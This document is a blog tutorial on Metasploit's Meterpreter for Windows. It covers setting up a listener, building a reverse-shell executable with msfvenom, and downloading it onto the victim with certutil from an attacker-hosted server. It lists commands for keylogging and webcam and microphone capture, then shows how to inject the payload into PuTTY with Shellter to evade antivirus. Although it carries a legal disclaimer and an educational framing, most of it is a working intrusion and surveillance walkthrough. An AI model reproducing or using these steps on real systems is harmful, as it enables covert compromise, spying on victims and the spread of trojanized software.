Meterpreter Shells on Windows Systems

Image credit: https://medium.com/@msbj/decoding-meterpreter-commands-dca5bd25873f

In a previous guide, I walked you through how to get basic reverse shells on Linux and Windows systems. Link below

One of the few concepts in real-life hacking that lives up to depictions of hacking in movies and TV are reverse shells. Reverse shells are a common method of compromise used by hackers to gain access to systems via a ‘shell’. In plain English, it is a way to trick a system into sending an interactive command line interface, or ‘shell’, back to a hacker’s system. This lets the hacker execute system commands on the victim machine remotely, thereby compromising the victim machine.

https://www.ericholub.com/blog/reverse-shells/

At the end of that guide I teased the possibility about a guide on Meterpreter shells. The day has come (earlier than expected), and that guide is now a reality. I’m going to focus on Windows systems in this guide, since Meterpreter is much more frequently used on Windows over Linux.

What is Meterpreter you ask? It’s basically an advanced interactive shell generated by Metasploit which enables advanced features/benefits like persistence, increased stealth, screen capturing, vulnerability scanning, multiple sessions, and much more. If you have the choice between a standard shell and Meterpreter, I’d go Meterpreter any day.

Next I must offer a warning. DO NOT execute this attack on hardware without EXPLICIT PERMISSION from the OWNER of said hardware. Executing this attack without proper authorization is equivalent to a CYBER CRIME, and carries with it penalties under law. I’m sharing this information for educational purposes, and accept no responsibility for damages caused by said information. You’ve been warned.

Let’s get into it. First off, you’ll need to boot up Kali Linux. Right away you’ll want to figure out the local IP address of your machine. You can do so with the following command:

ifconfig

Note that value down for later. Next, it’s time to launch Metasploit. You can do that with another single line command

msfconsole

There’s always some fun ASCII art when you boot up Metasploit, love it

That will launch the Metasploit Command Line Interface (CLI). Without explaining too much, Metasploit is an all-in-one hacking platform used to compromise all kinds of systems and programs. We’re going to use it to start our Meterpreter shell listener. Once this listener gets a connection, it will deploy the Meterpreter payload and hopefully start a Meterpreter shell.

We’ll setup our attack by defining what kind of attack we want and what kind of payload we want to deliver. These are the two values we want:

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp

Note: you may want to check to make sure your victim Windows computer is 64-bit. You can do this on Windows 11 by opening the ‘Settings’ app and going to the following:

System specs humble brag included for free

If your system is 32-bit, then you’ll want to substitute ‘x86’ for ‘x64’ in the payload command. If your system is less than 15 years old, then there is a very good chance it is 64-bit.

Moving on. We can view additional options for our Metasploit command by entering the following command:

options

There are two additional options we need to fill in there. ‘LHOST’ and ‘LPORT’. ‘L’ stands for ‘listen’. These options basically define what network interface and what system port we want to run our Meterpreter shell on. I’ll specify ‘eth0’ since it is the default network interface in virtual Kali Linux and ‘4242’ for the port since I really like Hitchhikers Guide to the Galaxy.

set LHOST eth0
set LPORT 4242

So now if we run ‘options’ again, we should see these values filled in:

Yup. We’re ready to start our listener. So a lot of people will tell you to execute a ‘run’ command here, but let me introduce the much cooler sounding (and functionally identical) ‘exploit’ command:

exploit

Our listener is officially listening. This is equivalent to the Netcat command I shared in the last guide, just much nastier.

OK, now that we have a listener going we need to have our victim Windows machine send it a shell. This can’t be a shell from any old PowerShell script, it needs to be custom made for our listener. The easiest way to get this is will msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.226.146 LPORT=4242 -f exe -o rshell.exe

Running this command will generate a Windows executable file (.exe) that when run will send a shell to our listener. Take note of the ‘LHOST’ and ‘LPORT’ values in that command. They should be the same as the ones we defined earlier in Metasploit.

With our ‘rshell.exe’ file in Kali, it’s time to transfer it to our victim Windows machine. I’ll start by hosting this file in a simple HTTP server via Python3

python3 -m http.server 80

Then I’ll open a CMD prompt on the victim machine and download this file from the server:

certutil -urlcache -f http://192.168.226.146/rshell.exe rshell.exe

Once that is done…. wait a minute

I talked a lot of crap about Trend Micro in the last guide, but it managed to detect the threat inherent in this file and removed it. Well done. Later in this guide I’ll share a method that will bypass most antivirus software, but for now I’ll just disable Trend Micro and try again.

Once ‘rshell.exe’ is on the victim computer, it’s time to run it. That’s as easy as typing the file name into the CMD prompt

rshell.exe

Once that is done it’s time to check our listener…

Meterpreter confirmed. We can get basic user info with the following command:

getuid

If we want to drop into a standard CMD prompt, we can simply type:

shell

You can then close this CMD prompt with

exit

If you want to play around with this yourself, there’s just one more command you should know:

help

That will list out all the available commands and what they do. There is a whole list of Meterpreter commands to learn. I’ll link a good guide below

Here are some of the more amusing ones in my opinion:

Command	Description	Example Usage
play	plays a specified .wav audio file on the victim machine	play /home/kali/transfers/dj-airhorn.wav
keyscan_start	listens and records keystrokes on the victim machine	keyscan_start
keyscan_dump	prints out keystrokes captured by the previous command	keyscan_dump
screenshare	shows a live video feed of the victim’s screens	screenshare
webcam_list	lists out webcams currently connected to the victim machine	webcam_list
webcam_stream	shows a live video feed from the specified webcam attached to the victim machine	webcam_stream -i 3
record_mic	records audio from microphones attached to the victim machine and saves it to the attacker machine	record_mic -d 10

If you’ve been paying attention, then I hope you’re pretty creeped out by all this. It’s hilariously easy to spy on someone via Meterpreter. The amount of damage you can do with one shell is insane. Let’s make it a lot worse.

As promised, let’s look into how to bypass antivirus with our Meterpreter executable. If you’ll recall, my antivirus caught and deleted my ‘rshell.exe’ file pretty quickly.

We’ll do this with a program called Shellter. It will allow us to inject our Meterpreter reverse shell code into a legitimate Windows executable file. Setting up Shellter is a bit of an adventure, so please bear with me.

First, run the following commands:

sudo dpkg --add-architecture i386
sudo update && sudo apt install wine32

Next I recommend you reboot your Kali Linux instance. Once it’s rebooted, run the following two commands to install and configure Winetricks and Shellter respectively:

winetricks
shellter

Once they are both installed, you should be good to go. Let’s run Shellter

shellter

It’s asking what mode we want. I’ll say ‘A’ for ‘Automatic’

Now it’s asking for ‘PE Target’. ‘PE’ means ‘Portable Executable’. This means it’s asking us for the location of a legitimate Windows executable file. Unfortunately, Shellter currently only support 32-bit executables. A good target for this is the 32-bit PuTTY executable. I’ll link below

Once ‘putty.exe’ is downloaded on Kali, state the absolute path where it resides

It will take some time to analyze the executable, so give it a minute. Next you should see the following option:

I’ll specify ‘Y’ for yes. Stealth mode means the Putty program will execute normally along with our Meterpreter shell code, making it even harder to detect.

Next option:

Choice #1 should look familiar. That’s exactly what we want. I’ll specify ‘L’ for a listed payload and then ‘1’ for the ‘Meterpreter_Reverse_TCP’ payload

Alright, very familiar. I’ll input my attacker IP and port 4242 for the next two options

Let that run out and…

Done! Our ‘putty.exe’ file should now be totally malicious. Let’s try it out.

Next I’ll close out my current Meterpreter shell. Before I re-run the exploit, I need to update the ‘payload’ value to not include ‘x64’

set payload windows/meterpreter/reverse_tcp

Now I’ll re-run ‘exploit’, which will start my listener again.

Next I’ll restart Trend Micro on my victim machine.

Now I’ll host my ‘putty.exe’ file in my HTTP server directory and download it onto the victim machine just like before

certutil -urlcache -f http://192.168.226.146/putty.exe putty.exe

This time Trend Micro did not automatically delete the file. Let’s try to run it

putty.exe

Touché Trend Micro. If you look closely at the warning though, it’s more concerned with the file’s source than the actual content of the file. This will likely happen for any file downloaded from a local source or shared via USB drive. Exactly the kind of warning people are good at ignoring. What happens when we click ‘Open file’?

PuTTy launched as expected. Let’s check our Metasploit listener:

A shell! Since PuTTY is working exactly as expected, our presence would likely go unnoticed. Moral of the story folks: don’t trust files that don’t come from the source itself.

Anyway, that was an interesting ride. Meterpreter is a tool that will serve you well along your hacking journey. I only ask that you use this power for good. Have a good day.